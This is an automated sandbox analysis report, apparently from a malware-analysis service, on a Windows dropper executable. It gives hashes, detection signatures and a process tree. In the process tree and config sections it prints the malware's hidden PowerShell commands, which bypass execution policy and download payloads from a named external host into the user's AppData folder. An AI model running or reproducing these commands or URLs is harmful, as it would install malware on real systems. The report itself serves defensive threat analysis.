Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    27-11-2024 09:21

General

  • Target

    73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exe

  • Size

    212KB

  • MD5

    43b55685945d2cecc170b850cf622038

  • SHA1

    3b301a8a8a38dddd3cfb554b264342f9948102b0

  • SHA256

    73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f

  • SHA512

    ba08284c9c07150f68fc92be46cdf058caa0b6f9b25135cc2716c286efdbcfd59d79f5bf211260d900ac3fd8fe78b582010ae8985b2f240829c9b94020ae7a65

  • SSDEEP

    3072:DNDzKKCY4RZzOo8u2IJskwUu25iiik4l9ep6RHpm0/d2IK9EzB2tPNxBWg3facbN:pDGKClZl8P6KVRH83TtVf33bncxfq

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://frameupds.info/rwrw66/2222z.php

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://frameupds.info/rwrw66/1111z.php

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exe
    "C:\Users\Admin\AppData\Local\Temp\73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2212
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Roaming\ewqeq.cmd
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2832
      • C:\Windows\system32\PING.EXE
        ping localhost -n 6
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2584
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass $KRIIR = New-Object System.Net.WebClient; $KRIIR.Headers['User-Agent'] = 'Command'; $KRIIR.downloadfile('http://frameupds.info/rwrw66/2222z.php','C:\Users\Admin\AppData\Roaming\7za.exe');
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2544
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass $KRIIR = New-Object System.Net.WebClient; $KRIIR.Headers['User-Agent'] = 'Command'; $KRIIR.downloadfile('http://frameupds.info/rwrw66/1111z.php','C:\Users\Admin\AppData\Roaming\25520.7z');
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:276

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    5b920cc7a32f313f3ffcd58ea1cf1f92

    SHA1

    e0b3bcc85b6246236451f9762755afd2c3f8bcdd

    SHA256

    277aad4e73cf2ea17a51f58ce0698d181adc185ad1fb8a19b38fb375a62bafdb

    SHA512

    c3b2c236df5a7c54941798dad05bee82b5c483042a906493bb949dde833489a83afd6092a703eadc419a037bb6999247bc52923765f55b1060944454ef892ff3

  • C:\Users\Admin\AppData\Roaming\ewqeq.cmd

    Filesize

    5KB

    MD5

    03868028bcd5c24c468e2c66571fb850

    SHA1

    c1dbed55b06bcc1b6a6211f7f8de592d92beb911

    SHA256

    c9bbb054e47836ee23efdb0c3d4ad193f7cbad635cfc9f2ba37da1d912a8b313

    SHA512

    d3527a2b639e694a2c4c9ab3279092f6e470a7e86b3bd5aff3fdfe63760eee2c4393f0b43067e6d922064fabef6c510008676cabb9031aaf3fbee4305ab6c999

  • memory/276-19-0x0000000002340000-0x0000000002348000-memory.dmp

    Filesize

    32KB

  • memory/276-18-0x000000001B550000-0x000000001B832000-memory.dmp

    Filesize

    2.9MB

  • memory/2212-4-0x0000000002780000-0x0000000002790000-memory.dmp

    Filesize

    64KB

  • memory/2544-10-0x0000000002C00000-0x0000000002C80000-memory.dmp

    Filesize

    512KB

  • memory/2544-11-0x000000001B730000-0x000000001BA12000-memory.dmp

    Filesize

    2.9MB

  • memory/2544-12-0x00000000027E0000-0x00000000027E8000-memory.dmp

    Filesize

    32KB